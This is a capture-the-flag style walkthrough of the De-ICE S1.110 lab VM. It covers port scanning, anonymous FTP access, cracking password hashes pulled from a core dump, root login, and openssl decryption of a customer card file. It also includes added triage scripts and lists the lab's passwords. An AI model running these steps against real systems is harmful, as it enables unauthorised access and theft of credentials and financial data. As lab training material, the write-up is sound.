De-ICE S1.110 Walkthrough

While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple: each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun, and hopefully these are helpful.

De-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

We hit it with a version scan to determine what is running, and write the results as XML so we can practice using the Metasploit database. You can run it all from inside msfconsole with the db_nmap command and the normal nmap switches, but I'm showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a workspace named deice in the Metasploit database and sets it as the current workspace.

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website, because it has info you need: it lists three email addresses, which give you a starting point for the user list:

   adamsa@herot.net
   banterb@herot.net
   coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous
   set RHOSTS 192.168.42.110
   run

Use either the command line or FileZilla to get access to FTP.
I used FileZilla and downloaded everything.
The download/etc/shadow file seems promising.
John can work with the shadow file without unshadowing it.

Running john against it:

   john --rules --wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in download/opt/cygwin/etc but no shadow file, so moving along.
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that: it is a Linux core dump file. Go read up on that; we'll wait.

   strings core

The end looks like a dump of a shadow file.

   strings core > /root/Desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. Look at the shadow file from the S1.100 disk for the normal format; second verse, same as the first.

   john --rules --wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us passwords for the following users: root and bbanter. SSH to the box as bbanter, then switch to root:

   ssh bbanter@192.168.42.110
   su -
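The core dump is the point of the whole disk: the admin "sanitized" the box, but an ELF core file that was lying in an FTP-exposed directory still carried the contents of /etc/shadow in memory. The script below is an added example, not part of the original walkthrough or the De-ICE image: it checks whether a file is an ELF core dump (magic bytes plus e_type == ET_CORE) and pulls out every printable run that matches the shadow(5) layout with a real hash field, which is the manual "split it at the usernames" step automated. It is the sort of check you would run over an export directory before letting anything on it be served. The core file used in the test is constructed; no data from the target is embedded.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: triage a file that may
# be a core dump and pull shadow-style password entries out of it.

# Return 0 when the file starts with the ELF magic and its e_type field
# (bytes 16-17, little-endian) is 4 = ET_CORE.  Assumes an LSB (little-endian)
# ELF, which is what `file core` reported above.
is_elf_core() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    etype=$(od -An -tx1 -j16 -N2 "$1" | tr -d ' \n')
    [ "$magic" = "7f454c46" ] && [ "$etype" = "0400" ]
}

# Print each printable run in the file that matches the shadow(5) layout with
# a real hash field (name:$id$salt$hash:lastchg:min:max:...).  Locked or
# passwordless accounts (*, !, empty) are dropped: there is nothing to crack
# and they only clutter the John input.  Order is kept, duplicates removed.
extract_shadow_entries() {
    tr -c '[:print:]' '\n' < "$1" \
        | grep -E '^[a-z_][a-z0-9_-]*:\$[0-9a-z]+\$[^:]*:[0-9]*:[0-9]*:[0-9]*:' \
        | awk '!seen[$0]++'
}

# Usage: sh core_triage.sh /path/to/core > coreshadow
if [ $# -ge 1 ]; then
    if is_elf_core "$1"; then
        echo "$1: ELF core dump" >&2
    fi
    extract_shadow_entries "$1"
fi
```

The defensive takeaway is the one the scenario is built around: a core dump of a privileged process can contain anything that process had read, so core files belong under a restrictive core_pattern or ulimit and never in a directory that an anonymous service can read.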

From the S1.100 disk we know that .enc files are encrypted, and we are looking for credit card data, so why not try to find that again.

   cd /
   find / -iname '*.enc'

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc -d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT, NO JOY!
Let's go look at the /home/root/.save folder:

   cd /home/root/.save
   ls

Look at the copy.sh script:

   cat copy.sh

This is the script that encrypted the file: it uses aes-256-cbc and reads the passphrase from the file named in its -pass file: argument. Let's decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM, you're done. OpenSSL is a pain, but now you're a pro.
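To make the two openssl attempts above concrete, here is an added example (not from the walkthrough or the De-ICE image) that reproduces the same `openssl enc ... -pass file:` pattern copy.sh used, on constructed data in a scratch directory. It shows the round trip with the right cipher, why the first attempt with -aes-128-cbc could not work (the key derived from the passphrase is a different length for the two ciphers), and the check that actually matters for the scenario: the mode of the passphrase file, since anyone who can read it can decrypt the backup. All paths and the passphrase are made up here.

```shell
#!/bin/sh
# Added example, not from the walkthrough or the De-ICE image: the
# "openssl enc ... -pass file:" pattern copy.sh used, run on constructed data.

# Encrypt $1 -> $2 with AES-256-CBC, taking the passphrase from the first line
# of file $3 (that is what "-pass file:" means; copy.sh pointed it at
# /etc/ssl/certs/pw).
encrypt_with_passfile() {
    openssl enc -aes-256-cbc -salt -in "$1" -out "$2" -pass "file:$3" 2>/dev/null
}

# Decrypt $1 to stdout with passphrase file $2 using cipher $3.  The cipher
# has to match the one used for encryption: aes-128-cbc and aes-256-cbc derive
# different key lengths from the same passphrase, which is why the first
# attempt in the walkthrough produced nothing usable.
decrypt_with_passfile() {
    openssl enc -d "-$3" -in "$1" -pass "file:$2" 2>/dev/null
}

# Return 0 when the passphrase file is readable only by its owner.  Whoever can
# read this file can decrypt the backup, so its mode matters more than the
# cipher choice.
passfile_is_private() {
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

# Round trip in a scratch directory (run stand-alone: sh enc_demo.sh).
demo() {
    work=$(mktemp -d)
    # constructed sample data; no real customer rows
    printf 'name,card\nJ. Doe,card-number-placeholder\n' > "$work/customer_account.csv"
    printf 'example-passphrase\n' > "$work/pw"
    chmod 600 "$work/pw"
    encrypt_with_passfile "$work/customer_account.csv" "$work/customer_account.csv.enc" "$work/pw"
    echo "== correct cipher =="
    decrypt_with_passfile "$work/customer_account.csv.enc" "$work/pw" aes-256-cbc
    echo "== wrong cipher =="
    if decrypt_with_passfile "$work/customer_account.csv.enc" "$work/pw" aes-128-cbc > /dev/null; then
        echo "(exited 0 by chance, but the output is not the plaintext)"
    else
        echo "(bad decrypt)"
    fi
    passfile_is_private "$work/pw" && echo "pw file is owner-only"
    rm -rf "$work"
}

demo
```

Two notes for anyone reusing the pattern defensively: current OpenSSL releases warn that the legacy passphrase-to-key derivation used by a bare `-pass` is deprecated, and `openssl enc` accepts `-pbkdf2` for new encryptions; and the file named by `-pass file:` is the real secret, so it needs the same handling as a private key (owner-only mode, not sitting next to the script that uses it on a box that was "sanitized" instead of rebuilt).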

Account Information

root:Complexity
bbanter:Zymurgy
